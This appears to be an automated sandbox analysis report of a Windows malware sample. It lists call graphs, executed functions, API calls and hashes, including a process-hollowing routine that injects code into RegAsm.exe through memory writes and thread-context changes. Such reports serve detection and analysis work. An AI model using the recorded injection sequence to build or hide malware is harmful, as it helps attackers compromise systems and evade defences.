20179->20201 20183->20176 20184->20174 20186 c7e736 20185->20186 20189 c7e74b 20185->20189 20187 c7126b __dosmaperr 14 API calls 20186->20187 20188 c7e73b 20187->20188 20191 c7127e __strnicoll 14 API calls 20188->20191 20190 c7126b __dosmaperr 14 API calls 20189->20190 20192 c7e770 20189->20192 20193 c7e77b 20190->20193 20194 c7e743 20191->20194 20192->20177 20195 c7127e __strnicoll 14 API calls 20193->20195 20194->20177 20196 c7e783 20195->20196 20197 c6da7f __strnicoll 41 API calls 20196->20197 20197->20194 20199 c76881 __strnicoll 14 API calls 20198->20199 20200 c71270 20199->20200 20200->20183 20202 c7e675 ___scrt_uninitialize_crt LeaveCriticalSection 20201->20202 20203 c7a6d7 20202->20203 20203->20128 20204->20105 20205->20088 20217 c87025 20218 c87038 20217->20218 20246 c70396 20218->20246 20220 c87057 20221 c8709d 20220->20221 20222 c87060 20220->20222 20267 c65d5b 20221->20267 20224 c870aa 20222->20224 20225 c8706a GetCurrentThreadId 20222->20225 20228 c65d5b std::_Throw_Cpp_error 43 API calls 20224->20228 20226 c870b1 20225->20226 20227 c87074 20225->20227 20230 c65d5b std::_Throw_Cpp_error 43 API calls 20226->20230 20261 c65ba5 WaitForSingleObjectEx 20227->20261 20228->20226 20232 c870b8 20230->20232 20234 c65d5b std::_Throw_Cpp_error 43 API calls 20232->20234 20233 c87087 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20245 c870bf codecvt std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20234->20245 20235 c87532 20236 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 20235->20236 20237 c87543 20236->20237 20238 c8754e 20239 c63cb0 std::_Throw_Cpp_error 43 API calls 20238->20239 20240 c87553 20239->20240 20241 c6e60e 44 API calls 20241->20245 20242 c61770 43 API calls std::_Throw_Cpp_error 20242->20245 20243 c87549 20244 c6da8f std::_Throw_Cpp_error 41 API calls 20243->20244 20244->20238 20245->20235 20245->20238 20245->20241 20245->20242 20245->20243 20247 c703b7 20246->20247 20248 c703a3 20246->20248 20273 c70346 20247->20273 20249 c7127e __strnicoll 14 API calls 20248->20249 20251 c703a8 20249->20251 20254 c6da7f __strnicoll 41 API calls 20251->20254 20253 c703cc CreateThread 20255 c703eb GetLastError 20253->20255 20259 c703f7 20253->20259 20295 c7023a 20253->20295 20256 c703b3 20254->20256 20282 c71224 20255->20282 20256->20220 20287 c702b8 20259->20287 20262 c65bee 20261->20262 20263 c65bbc 20261->20263 20262->20232 20262->20233 20264 c65bc3 GetExitCodeThread 20263->20264 20265 c65bd9 CloseHandle 20263->20265 20264->20262 20266 c65bd4 20264->20266 20265->20262 20266->20265 20268 c65d71 std::_Throw_Cpp_error 20267->20268 20335 c65c7b 20268->20335 20274 c773ff __strnicoll 14 API calls 20273->20274 20275 c70357 20274->20275 20276 c7745c ___free_lconv_mon 14 API calls 20275->20276 20277 c70364 20276->20277 20278 c7036b GetModuleHandleExW 20277->20278 20279 c70388 20277->20279 20278->20279 20280 c702b8 16 API calls 20279->20280 20281 c70390 20280->20281 20281->20253 20281->20259 20283 c7126b __dosmaperr 14 API calls 20282->20283 20284 c7122f __dosmaperr 20283->20284 20285 c7127e __strnicoll 14 API calls 20284->20285 20286 c71242 20285->20286 20286->20259 20288 c702c4 20287->20288 20289 c702e8 20287->20289 20290 c702d3 20288->20290 20291 c702ca CloseHandle 20288->20291 20289->20220 20292 c702e2 20290->20292 20293 c702d9 FreeLibrary 20290->20293 20291->20290 20294 c7745c ___free_lconv_mon 14 API calls 20292->20294 20293->20292 20294->20289 20296 c70246 ___scrt_is_nonwritable_in_current_image 20295->20296 20297 c7024d GetLastError ExitThread 20296->20297 20298 c7025a 20296->20298 20299 c76730 __Getctype 41 API calls 20298->20299 20300 c7025f 20299->20300 20309 c790b2 20300->20309 20304 c70276 20317 c70419 20304->20317 20310 c790c4 GetPEB 20309->20310 20311 c7026a 20309->20311 20310->20311 20312 c790d7 20310->20312 20311->20304 20314 c78fbd 20311->20314 20320 c78be3 20312->20320 20315 c78b20 std::_Lockit::_Lockit 5 API calls 20314->20315 20316 c78fd9 20315->20316 20316->20304 20323 c702ef 20317->20323 20321 c78b20 std::_Lockit::_Lockit 5 API calls 20320->20321 20322 c78bff 20321->20322 20322->20311 20324 c76881 __strnicoll 14 API calls 20323->20324 20327 c702fa 20324->20327 20325 c7033c ExitThread 20326 c70313 20329 c70326 20326->20329 20330 c7031f CloseHandle 20326->20330 20327->20325 20327->20326 20332 c78ff8 20327->20332 20329->20325 20331 c70332 FreeLibraryAndExitThread 20329->20331 20330->20329 20331->20325 20333 c78b20 std::_Lockit::_Lockit 5 API calls 20332->20333 20334 c79011 20333->20334 20334->20326 20336 c65c87 __EH_prolog3_GS 20335->20336 20345 c62950 20336->20345 20339 c62a00 std::_Throw_Cpp_error 43 API calls 20340 c65cb0 20339->20340 20349 c62f80 20340->20349 20342 c65cb8 20354 c6954a 20342->20354 20346 c62971 20345->20346 20346->20346 20347 c617d0 std::ios_base::_Init 43 API calls 20346->20347 20348 c62983 20347->20348 20348->20339 20350 c62f8b 20349->20350 20351 c62fa6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20349->20351 20350->20351 20352 c6da8f std::_Throw_Cpp_error 41 API calls 20350->20352 20351->20342 20353 c62fca 20352->20353 20353->20342 20355 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 20354->20355 20356 c69554 20355->20356 20356->20356 20209 86018d 20212 8601c5 20209->20212 20210 8602d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20211 8603a2 WriteProcessMemory 20210->20211 20210->20212 20213 8603e7 20211->20213 20212->20210 20214 860392 TerminateProcess 20212->20214 20215 8603ec WriteProcessMemory 20213->20215 20216 860429 WriteProcessMemory Wow64SetThreadContext ResumeThread 20213->20216 20214->20210 20215->20213 20206 c6dbe5 20207 c7745c ___free_lconv_mon 14 API calls 20206->20207 20208 c6dbfd 20207->20208

                                                    Executed Functions

                                                    Function 0086018D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,008600FF,008600EF), ref: 008602FC
                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0086030F
                                                    • Wow64GetThreadContext.KERNEL32(00000120,00000000), ref: 0086032D
                                                    • ReadProcessMemory.KERNELBASE(0000011C,?,00860143,00000004,00000000), ref: 00860351
                                                    • VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 0086037C
                                                    • TerminateProcess.KERNELBASE(0000011C,00000000), ref: 0086039B
                                                    • WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 008603D4
                                                    • WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 0086041F
                                                    • WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 0086045D
                                                    • Wow64SetThreadContext.KERNEL32(00000120,00880000), ref: 00860499
                                                    • ResumeThread.KERNELBASE(00000120), ref: 008604A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087085459.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_860000_56bDgH9sMQ.jbxd
                                                    Similarity
                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                    • API String ID: 2440066154-1257834847
                                                    • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                    • Instruction ID: d19768ddd90cdf316373c686924ea67fe9fd7274dbbf6c8cc29763ab750b749c
                                                    • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                    • Instruction Fuzzy Hash: 55B1D67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94
                                                    Function 00C87930 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214synchronizationthreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 43 c87930-c87958 call c69271 46 c8795a-c8796f 43->46 47 c87971-c87975 43->47 48 c87979-c8797c 46->48 47->48 49 c8797e-c87981 48->49 50 c879b0-c879c6 48->50 49->50 52 c87983-c87990 49->52 51 c879d0-c879e7 50->51 53 c879e9-c879f4 51->53 54 c879f6-c87a09 call c61bd0 51->54 55 c87992-c879a0 52->55 56 c879a6-c879ad call c692a1 52->56 59 c87a0d-c87a11 53->59 54->59 55->56 57 c87bba-c87bde call c6da8f CreateThread WaitForSingleObject 55->57 56->50 59->51 63 c87a13-c87a28 59->63 66 c87a2a-c87a30 63->66 67 c87a9d-c87aa8 63->67 70 c87bb0 call c63cc0 66->70 71 c87a36-c87a43 66->71 68 c87aae 67->68 69 c87b33-c87b35 67->69 75 c87ab0-c87b2d call c61200 call c621f0 call c61200 call c621f0 call c6e60e 68->75 72 c87b62-c87b72 call c692a1 69->72 73 c87b37-c87b44 69->73 83 c87bb5 call c63c70 70->83 76 c87a70-c87a72 71->76 77 c87a45-c87a4a 71->77 95 c87b9d-c87baf call c692b4 72->95 96 c87b74-c87b81 72->96 81 c87b58-c87b5f call c692a1 73->81 82 c87b46-c87b54 73->82 116 c87b2f 75->116 79 c87a74-c87a83 call c69271 76->79 80 c87a85 76->80 77->83 85 c87a50-c87a5b call c69271 77->85 88 c87a87-c87a9a call c6a2c0 79->88 80->88 81->72 82->57 89 c87b56 82->89 83->57 85->57 102 c87a61-c87a6e 85->102 88->67 89->81 103 c87b93-c87b9a call c692a1 96->103 104 c87b83-c87b91 96->104 102->88 103->95 104->57 104->103 116->69
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,00C87BE0,00000000,00000000,00000000), ref: 00C87BCF
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00C87C86), ref: 00C87BD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectSingleThreadWait
                                                    • String ID: C$Earth$Own head
                                                    • API String ID: 1891408510-3365287836
                                                    • Opcode ID: 9472eefce2f595e73fc526adbe4995c0c8e8cede6aa1e0fd424896ba89cfe727
                                                    • Instruction ID: 57aa185c931e81cdef0989123ededa2bc603aeb23fc6dc55dc5de20879f79e48
                                                    • Opcode Fuzzy Hash: 9472eefce2f595e73fc526adbe4995c0c8e8cede6aa1e0fd424896ba89cfe727
                                                    • Instruction Fuzzy Hash: B57122719083406BD724EF348CC5B6FB794AF45314F280B2DF8A5A6182E730E688A799
                                                    Function 00C790B2 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 458 c790b2-c790c2 459 c790c4-c790d5 GetPEB 458->459 460 c790f1-c790f5 458->460 461 c790d7-c790db call c78be3 459->461 462 c790e8-c790ef 459->462 464 c790e0-c790e3 461->464 462->460 464->462 465 c790e5-c790e7 464->465 465->462
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4ca35138b953b113db3b61dd3ea584cded334510e746caaba22b61a56fab146
                                                    • Instruction ID: 6db56bed3fcc1465980a78a336bcb4c50a3011967d9c898a58051c716adcd4be
                                                    • Opcode Fuzzy Hash: a4ca35138b953b113db3b61dd3ea584cded334510e746caaba22b61a56fab146
                                                    • Instruction Fuzzy Hash: 85F0A031A202209BCF26D74CC809B8873ACEB48B51F11805AF505E7140C370DE04C7D0
                                                    Function 00C78A55 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 22 c78a55-c78a61 23 c78af3-c78af6 22->23 24 c78a66-c78a77 23->24 25 c78afc 23->25 27 c78a84-c78a9d LoadLibraryExW 24->27 28 c78a79-c78a7c 24->28 26 c78afe-c78b02 25->26 31 c78b03-c78b13 27->31 32 c78a9f-c78aa8 GetLastError 27->32 29 c78a82 28->29 30 c78b1c-c78b1e 28->30 34 c78af0 29->34 30->26 31->30 33 c78b15-c78b16 FreeLibrary 31->33 35 c78ae1-c78aee 32->35 36 c78aaa-c78abc call c763b8 32->36 33->30 34->23 35->34 36->35 39 c78abe-c78ad0 call c763b8 36->39 39->35 42 c78ad2-c78adf LoadLibraryExW 39->42 42->31 42->35
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,00C78B62,?,?,00000001,00000000,?,?,00C78DCC,00000021,FlsSetValue,00C8C5BC,00C8C5C4,00000001), ref: 00C78B16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3664257935-537541572
                                                    • Opcode ID: 2d5d7ecb9b7d007873c58d8a25be7e263caf6b0ae6dbd1551fade84b0509afea
                                                    • Instruction ID: 14b43ccc850cfad07e277f4c9883ac3d3caa60707d3046bb763daf36e5ae3621
                                                    • Opcode Fuzzy Hash: 2d5d7ecb9b7d007873c58d8a25be7e263caf6b0ae6dbd1551fade84b0509afea
                                                    • Instruction Fuzzy Hash: 6F213531A80210ABCB219B24DC88B5F3768DB01370F154126EA1EA72D0DF30EE09D7E4
                                                    Function 00C87025 Relevance: 7.9, APIs: 5, Instructions: 421threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 117 c87025-c87036 118 c87038-c8703e 117->118 119 c87040 117->119 120 c87042-c87052 call c70396 118->120 119->120 122 c87057-c8705e 120->122 123 c8709d-c870a5 call c65d5b 122->123 124 c87060-c87068 122->124 127 c870aa-c870ac call c65d5b 123->127 124->127 128 c8706a-c87072 GetCurrentThreadId 124->128 129 c870b1-c870b3 call c65d5b 127->129 128->129 130 c87074-c87085 call c65ba5 128->130 135 c870b8-c870e7 call c65d5b 129->135 130->135 136 c87087-c8709c call c692a1 130->136 142 c870ed 135->142 143 c87532-c87546 call c692b4 135->143 144 c870f0-c87119 142->144 146 c8711e-c8712a 144->146 148 c8712c 146->148 149 c8712e-c87132 146->149 148->149 150 c87138-c8713d 149->150 151 c8727e-c87287 149->151 152 c8713f 150->152 153 c87141-c8714a 150->153 154 c87289 151->154 155 c8728b-c8728f 151->155 152->153 158 c8714c-c87170 153->158 159 c87172-c8717c 153->159 154->155 156 c873cc-c873fc call c6e60e * 2 155->156 157 c87295-c8729a 155->157 185 c874ab 156->185 186 c87402 156->186 160 c8729c 157->160 161 c8729e-c872b3 157->161 158->146 163 c8754e-c87553 call c63cb0 159->163 164 c87182-c8718e 159->164 160->161 166 c872d2-c872dc 161->166 167 c872b5-c872d0 161->167 169 c87190-c87195 164->169 170 c87197-c871a4 164->170 166->163 172 c872e2-c872ee 166->172 167->151 174 c871b5-c871eb call c61770 169->174 175 c871ad-c871b2 170->175 176 c871a6-c871ab 170->176 178 c872f0-c872f5 172->178 179 c872f7-c87304 172->179 187 c8724c-c87279 call c6a2c0 174->187 188 c871ed-c87214 call c6a2c0 174->188 175->174 176->174 182 c87315-c8734b call c61770 178->182 183 c8730d-c87312 179->183 184 c87306-c8730b 179->184 217 c8734d-c87374 call c6a2c0 182->217 218 c873a3-c873c7 call c6a2c0 182->218 183->182 184->182 190 c874af-c874b6 185->190 191 c87448-c8744f 186->191 192 c87409-c87413 186->192 193 c8746c-c87473 186->193 194 c874a2-c874a9 186->194 195 c87463-c8746a 186->195 196 c87427-c87435 186->196 197 c87487-c8748e 186->197 198 c87418-c87422 186->198 199 c87499-c874a0 186->199 200 c8745a-c87461 186->200 201 c8747e-c87485 186->201 202 c87490-c87497 186->202 203 c87451-c87458 186->203 204 c87475-c8747c 186->204 205 c87437-c87446 186->205 187->146 222 c8722c-c87247 call c692a1 188->222 223 c87216-c87224 188->223 207 c874b8-c874c5 190->207 208 c874e1-c874fd 190->208 191->190 192->190 193->190 194->190 195->190 196->190 197->190 198->190 199->190 200->190 201->190 202->190 203->190 204->190 205->190 211 c874d7-c874de call c692a1 207->211 212 c874c7-c874d5 207->212 214 c87528-c8752c 208->214 215 c874ff-c8750c 208->215 211->208 212->211 220 c87549 call c6da8f 212->220 214->143 214->144 224 c8751e-c87525 call c692a1 215->224 225 c8750e-c8751c 215->225 234 c8738c-c8739e call c692a1 217->234 235 c87376-c87384 217->235 218->151 220->163 222->146 223->220 230 c8722a 223->230 224->214 225->220 225->224 230->222 234->151 235->220 238 c8738a 235->238 238->234
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00C8706A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: fe081e50a38232a57c31b66b5d007992773047505236bf987bef0bafc3839dce
                                                    • Instruction ID: 2cdfce8887fe8636d4fbc6ff4f1f7c84e137e6535d8622162e718855491f5bb4
                                                    • Opcode Fuzzy Hash: fe081e50a38232a57c31b66b5d007992773047505236bf987bef0bafc3839dce
                                                    • Instruction Fuzzy Hash: D8F18B7150C3419FC314EF24C88066AFBE5EFC5318F244A2EF5AA9B251E730E945DB96
                                                    Function 00C875D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 241 c875d0-c87627 call c69271 244 c87630-c87662 call c61200 call c621f0 241->244 249 c87664-c87668 244->249 250 c87670-c87689 249->250 251 c8768b-c87692 250->251 252 c87693-c876a6 250->252 251->252 252->250 253 c876a8-c876b9 252->253 254 c876bf 253->254 255 c878e2-c8791b call c61d40 call c692a1 call c692b4 253->255 256 c876c0-c876c7 254->256 258 c876c9-c876d0 256->258 259 c876d1-c876e3 256->259 258->259 261 c876ec-c87748 OffsetRect Polyline call c61860 259->261 262 c876e5-c876eb 259->262 266 c8774d-c877f1 call c61a10 call c630c0 call c621f0 call c6e60e call c630c0 call c621f0 261->266 262->261 281 c87820-c87837 266->281 282 c877f3-c87800 266->282 285 c87839-c87849 281->285 286 c87881-c87883 281->286 283 c87802-c87810 282->283 284 c87816-c8781d call c692a1 282->284 283->284 289 c8791c-c87921 call c6da8f 283->289 284->281 291 c8784b-c87859 285->291 292 c8785f-c87879 call c692a1 285->292 287 c87885-c87893 286->287 288 c878c7-c878d3 286->288 293 c878a5-c878bf call c692a1 287->293 294 c87895-c878a3 287->294 288->255 295 c878d5-c878dd 288->295 291->289 291->292 292->286 293->288 294->289 294->293 295->256
                                                    APIs
                                                    • OffsetRect.USER32(00000000,00000000,00000000), ref: 00C876F6
                                                    • Polyline.GDI32(00000000,00000000,00000000), ref: 00C87713
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OffsetPolylineRect
                                                    • String ID: 0$Zatlat
                                                    • API String ID: 1418762327-1547964091
                                                    • Opcode ID: 2d65a45f8ef04fff97118387497949b9b03ac58a087ed823a75320ce4f6fc7be
                                                    • Instruction ID: 61a6a259c2577203640a844ccdcf7fc35f79207f300ff4cee0a5a1a6247859b1
                                                    • Opcode Fuzzy Hash: 2d65a45f8ef04fff97118387497949b9b03ac58a087ed823a75320ce4f6fc7be
                                                    • Instruction Fuzzy Hash: FA91C07150C3809FD320AF24C89976EBBE0AFC5318F280A2CF9D497292D775D548DB56
                                                    Function 00C70396 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 303 c70396-c703a1 304 c703b7-c703ca call c70346 303->304 305 c703a3-c703b6 call c7127e call c6da7f 303->305 310 c703cc-c703e9 CreateThread 304->310 311 c703f8 304->311 313 c70407-c7040c 310->313 314 c703eb-c703f7 GetLastError call c71224 310->314 315 c703fa-c70406 call c702b8 311->315 319 c70413-c70417 313->319 320 c7040e-c70411 313->320 314->311 319->315 320->319
                                                    APIs
                                                    • CreateThread.KERNELBASE(?,?,Function_0001023A,00000000,?,?), ref: 00C703DF
                                                    • GetLastError.KERNEL32 ref: 00C703EB
                                                    • __dosmaperr.LIBCMT ref: 00C703F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2744730728-0
                                                    • Opcode ID: f1769b43f6c80434ac18dacb9d05417c2707c01829684c4b50c34269234f2724
                                                    • Instruction ID: 528c2927dc389baa3892bfcf35388e2222e0c75c9d2d76ce5879193cfd29d819
                                                    • Opcode Fuzzy Hash: f1769b43f6c80434ac18dacb9d05417c2707c01829684c4b50c34269234f2724
                                                    • Instruction Fuzzy Hash: B0017572500219EFDF159FE4DC05AEE7B64EF00365F208068FD1996161DB70DE50EB90
                                                    Function 00C7023A Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(00C92420,0000000C), ref: 00C7024D
                                                    • ExitThread.KERNEL32 ref: 00C70254
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID:
                                                    • API String ID: 1611280651-0
                                                    • Opcode ID: 4b07636108fdd35ac45d82df07700315b0c433c52f0c6ec05e41aa40d141b646
                                                    • Instruction ID: 6d236927f94b27fc8b5a2d66b7bbe5c48b96931598cb908cc3e6b1274032627b
                                                    • Opcode Fuzzy Hash: 4b07636108fdd35ac45d82df07700315b0c433c52f0c6ec05e41aa40d141b646
                                                    • Instruction Fuzzy Hash: 4BF0A971940204EFDB10ABB1D84AB6E3B65EF54710F208059F00997292CF34AA45EBA1
                                                    Function 00C7745C Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 342 c7745c-c77465 343 c77467-c7747a RtlFreeHeap 342->343 344 c77494-c77495 342->344 343->344 345 c7747c-c77493 GetLastError call c711e1 call c7127e 343->345 345->344
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,00C7EEF0,?,00000000,?,?,00C7F191,?,00000007,?,?,00C7F68A,?,?), ref: 00C77472
                                                    • GetLastError.KERNEL32(?,?,00C7EEF0,?,00000000,?,?,00C7F191,?,00000007,?,?,00C7F68A,?,?), ref: 00C7747D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
